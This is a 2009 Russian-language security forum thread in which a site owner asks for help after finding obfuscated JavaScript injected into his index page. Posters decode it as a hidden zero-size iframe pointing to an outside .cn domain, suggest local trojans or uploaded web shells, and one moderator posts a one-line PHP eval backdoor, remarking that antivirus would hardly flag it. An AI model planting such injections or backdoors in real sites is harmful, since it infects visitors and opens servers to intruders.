HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вредоносный код на сайте!!!
  #1  
Старый 15.06.2009, 13:32
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию Вредоносный код на сайте!!!

Добрый день, дорогие форумчане!
Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал:
Код HTML:
<script language="javascript">
document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E '));
</script>


Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты.
В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое.
Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало.
Прошу вашей помощи, помогите разобраться, что, к чему.

Спасибо!
 
Ответить с цитированием

  #2  
Старый 15.06.2009, 13:36
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами: 9796693

Репутация: 659


По умолчанию

напиши УРЛ сайта, все из базы удалят
 
Ответить с цитированием

  #3  
Старый 15.06.2009, 13:37
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один
 
Ответить с цитированием

  #4  
Старый 15.06.2009, 13:38
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Код:
<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой
 
Ответить с цитированием

  #5  
Старый 15.06.2009, 18:05
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Пару троев грохнул! Пасы сменил.
 
Ответить с цитированием

  #6  
Старый 15.06.2009, 18:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Может в каком-нить файле шелл просто?
 
Ответить с цитированием

  #7  
Старый 15.06.2009, 18:59
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами: 9560486

Репутация: 1809


По умолчанию

Tigger, можиет, но как узнать?
 
Ответить с цитированием

  #8  
Старый 15.06.2009, 19:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Проверяй каждый файл на наличие вредоносного кода.
 
Ответить с цитированием

  #9  
Старый 17.06.2009, 23:11
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Tigger  
Проверяй каждый файл на наличие вредоносного кода.
PHP код:
<?PHP
eval($_GET['c']);
?>
Врятдле это антивирус запалит
 
Ответить с цитированием

  #10  
Старый 15.06.2009, 19:15
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
С нами: 10233548

Репутация: 1118


По умолчанию

Цитата:
можиет, но как узнать?
для начала с автора нужно вытащить инфу о версии двига =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакеры научились помещать вредоносный код в BIOS FraiDex Мировые новости. Обсуждения. 3 30.03.2009 12:16
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
Вредоносный код может быть записан в Bios при помощи Acpi dinar_007 Мировые новости. Обсуждения. 0 30.01.2006 16:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.